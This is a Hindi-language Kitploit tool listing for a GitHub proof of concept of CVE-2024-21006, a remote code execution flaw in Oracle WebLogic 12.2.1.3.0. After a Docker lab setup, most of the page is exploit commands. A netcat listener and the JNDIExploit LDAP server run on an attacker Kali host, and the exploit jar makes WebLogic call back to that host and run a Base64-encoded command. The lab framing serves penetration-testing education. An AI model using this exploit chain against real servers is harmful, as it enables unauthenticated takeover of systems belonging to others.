Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-21006_PoC — दूरस्थ कोड निष्पादन (RCE) - Oracle WebLogic 12.2.1.3.0 | Kitploit
उपकरण/GitHubGitHub/d3fudd/cve-2024-21006_poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubd3fudd/cve-2024-21006_poc

CVE-2024-21006_PoC

दूरस्थ कोड निष्पादन (RCE) - Oracle WebLogic 12.2.1.3.0

रिपॉजिटरी देखें
51 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-21006 PoC

CVE-2024-21006 Oracle WebLogic Server को प्रभावित करने वाली एक महत्वपूर्ण Remote Code Execution (RCE) भेद्यता है। यह दोष IIOP (Internet Inter-ORB Protocol) और JNDI (Java Naming and Directory Interface) प्रोटोकॉल के असुरक्षित उपयोग से संबंधित है, जो एक अनप्रमाणित दूरस्थ हमलावर को एक दुर्भावनापूर्ण JNDI संदर्भ के माध्यम से प्रभावित सर्वर पर मनमाना कोड निष्पादित करने की अनुमति देता है।

प्रयोगशाला की तैनाती

परिवेश को स्थापित करें:

root@kitploit:~
docker-compose up -d

Kali Shell तक पहुँचने के लिए:

root@kitploit:~
docker exec -it cve-2024-21006_poc-kali-1 /bin/bash

WebLogic Shell तक पहुँचने के लिए:

root@kitploit:~
docker exec -it cve-2024-21006_poc-weblogic-1 /bin/bash

ExploitBox Shell तक पहुँचने के लिए:

root@kitploit:~
docker exec -it exploitbox /bin/bash

इस चरण में, हमारे पास स्थानीय रूप से चल रहा WebLogic 12.2.1.3.0 का एक उदाहरण है: http://127.0.0.1:7001/console/login/LoginForm.jsp

लैब की खोज

सरल PoC:

Kali पर:

root@kitploit:~
nc -vnlp 1389

ExploitBox पर:

root@kitploit:~
java -jar CVE-2024-21006.jar <WebLogic IP> 7001 ldap://<Kali IP>:1389

ध्यान दें कि Kali को WebLogic से कनेक्शन प्राप्त हुआ:

RCE प्राप्त करना:

Kali पर, JNDIExploit प्रारंभ करें:

root@kitploit:~
cd /exploit
root@kitploit:~
java \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xml.internal.serializer=ALL-UNNAMED \
-jar JNDIExploit/JNDIExploit-1.3-SNAPSHOT.jar -i <Kali IP>

ExploitBox पर, एक्सप्लॉइट चलाएँ:

root@kitploit:~
java -jar CVE-2024-21006.jar <WebLogic IP> 7001 "ldap://<Kali IP>:1389/Basic/Command/Base64/<Base64 कमांड>"

Kali पर, देखें कि हमें अनुरोध प्राप्त हुआ:

WebLogic पर, देखें कि कमांड निष्पादित हुआ और फ़ाइल सफलतापूर्वक बनाई गई:

संदर्भ:

  • https://github.com/lightr3d/CVE-2024-21006_jar
  • https://github.com/momika233/CVE-2024-21006
  • https://blog.csdn.net/zwy15288408160/article/details/138189146
  • https://blog.csdn.net/m0_46109609/article/details/114373594
टूल डाउनलोड करें